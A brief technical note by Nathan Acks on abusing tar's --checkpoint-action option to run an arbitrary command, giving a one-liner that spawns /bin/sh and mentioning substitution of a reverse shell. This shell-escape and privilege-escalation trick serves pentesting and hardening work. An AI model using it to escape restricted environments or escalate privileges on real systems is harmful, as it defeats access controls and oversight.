author: Nathan Acks
Tar can be configured to execute an action for every N files processed using the –checkpoint and –checkpoint-action flags. So this will get us a shell:
tar -cf /dev/null /dev/null \ --checkpoint=1 --checkpoint-action=exec=/bin/sh
This works with any input/output file (not just /dev/null), and with any executable binary (such as a reverse shell).